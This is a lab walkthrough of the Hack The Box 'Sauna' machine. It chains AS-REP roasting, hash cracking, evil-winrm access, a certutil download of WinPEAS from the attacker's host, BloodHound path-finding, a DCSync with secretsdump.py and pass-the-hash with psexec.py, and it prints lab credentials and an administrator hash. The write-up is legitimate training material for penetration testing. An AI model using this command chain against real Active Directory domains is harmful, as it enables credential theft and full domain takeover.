Write-Ups
  • Intro
  • Active Directory
    • HTB | Forest
    • HTB | Sauna
    • HTB | Active
    • HTB | Blackfield
    • HTB | Resolute
    • HTB | Cascade
    • HTB | Cicada
    • HTB | Administrator
    • HTB | Authority
    • HTB | Office
  • Windows
    • HTB | Devel
    • HTB | Chatterbox
    • HTB | SecNotes
    • HTB | Access
    • HTB | Jeeves
    • HTB | Artic
    • HTB | Bastard
    • HTB | Bastion
    • HTB | Querier
  • Linux
    • HTB | BoardLight
    • THM | CMess
    • THM | ConvertMyVideo
    • HTB | Editorial
    • HTB | Mirai
    • HTB | Nibbles
    • HTB | Help
    • HTB | SwagShop
    • HTB | Jarvis
    • HTB | Sea
    • HTB | Chemistry
Powered by GitBook
On this page
  • NMAP
  • Port 80
  • Port 445 & 139
  • Port 389 - LDAP Enumeration
  • Port 88 - Kerberos
  • Foothold/shell
  • shell as fsmith
  • Privilege Escalation
  1. Active Directory

HTB | Sauna

PreviousHTB | ForestNextHTB | Active

Last updated 8 months ago

This is the Box on Hack The Box Active Directory 101 Track. Find the box here.

Skill Learned

  • ASREP Roasting

  • Attack DCSync Attack

NMAP

IP: 10.10.10.175

nmap -sC -sV 10.10.10.175 -Pn -T5

Port 80

We found a website.

Let's run gobuster.

Found nothing.

Port 445 & 139

SMB

Neither smbmap nor smbclient will allow me to list shares without a password:

RCP

I'll try to connect with null auth:

Looks like we do not have permission to view users and groups:

Port 389 - LDAP Enumeration

The nmap script did some basic enumeration and returned the domain EGOTISTICAL-BANK.LOCAL. I’ll dig in a bit more with ldapsearch.

ldapsearch -H ldap://10.10.10.175 -x -s base namingcontexts

-x           # simple auth
-H ldap://10.10.10.175  # host to query
-s base      # set the scope to base
namingcontexts  # return naming contexts

This gives the domain, EGOTISTICAL-BANK.LOCAL:

Now to get more info about the domain:

ldapsearch -H ldap://10.10.10.175 -x -b "dc=EGOTISTICAL-BANK,dc=local"

Port 88 - Kerberos

Make a list of usernames from username-anarchy. We have a list of users from the About Me page.

Now let's run username-anarchy:

./username-anarchy --input-file /home/anurag/Documents/sauna/username.txt --select-format first,flast,first.last,firstl

Now we have the usernames, we can use either of the lists to check for AS-REP Roasting.

Foothold/shell

shell as fsmith

As-REP Roasting background

This article has a great post on attacking Kerberos that includes AS-REP Roasting. Typically, when you try to request authentication through Kerberos, first the requesting party has to authenticate itself to the DC. But there is an option, DONT_REQ_PREAUTH where the DC will just send the hash to an unauthenticated user. AS-REP Roasting is looking to see if any known users happen to have this option set.

I’ll use the list of users I collected from username-anarchy, and run GetNPUsers.py to look for vulnerable users. Three come back as not vulnerable, but one gives a hash:

GetNPUsers.py 'EGOTISTICAL-BANK.LOCAL/' -usersfile uname.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.10.175

Since we got the hash we can use hashcat to crack it:

We got the password. Now we can use evil-winrm:

Boom! We have user.txt

Privilege Escalation

Having gained a foothold on the machine, we can use a script such as WinPEAS to automate enumeration tasks.

Run python server on Kali:

Download WinPEAS:

certutil -urlcache -f http://10.10.14.21/winPEASx64.exe winPEASx64.exe

Run WinPEAS:

Found svc_loanmanager cred. Examination of C:\Users\ confirms that the similarly named svc_loanmgr has logged on locally. Let's log on using evil-winrm:

evil-winrm -i 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'

Since DNS is configured and reachable:

If DNS is not reachable, run SharpHound.exe from the Victim Box (Sauna):

Use the following BloodHound command to get the JSON files:

bloodhound-python -u svc_loanmgr -p Moneymakestheworldgoround! -d EGOTISTICAL-BANK.LOCAL -ns 10.10.10.175 -c All

Start Neo4j and BloodHound and import the JSON files.

After uploading, search for svc_loanmanager, right-click, and mark as owner:

On the left, look for Outbound Object Control - items that this user has rights over. In this case, there is one:

Clicking the "1" adds that item to the graph:

This account has access to GetChanges and GetChangesAll on the domain. While looking at GetChanges help, we found we can abuse it using mimikatz:

DCSync

My preferred way to do a DCSync attack is using secretsdump.py, which allows me to run a DCSync attack from my Kali box, provided I can talk to the DC on TCP 445 and 135 and a high RPC port. This avoids fighting with AV, though it does create network traffic.

secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr:'Moneymakestheworldgoround!'@10.10.10.175

Now that we have the hashes, we can perform a Pass The Hash attack using psexec.py:

psexec.py administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e

And boom, we have root:

port 80
gobuster
smbclient
rpcclient
ldapsearch
ldapsearch
about us
username-anarchy
GetNPUsers.py
hashcat
evil-winrm and user.txt
http.server
svc_loanmanager
evil-winrm
dig @10.10.10.175
bloodhound-python

first degree object control
secretsdump.py
psexec.py
root.txt
nmap
smbmap
username.txt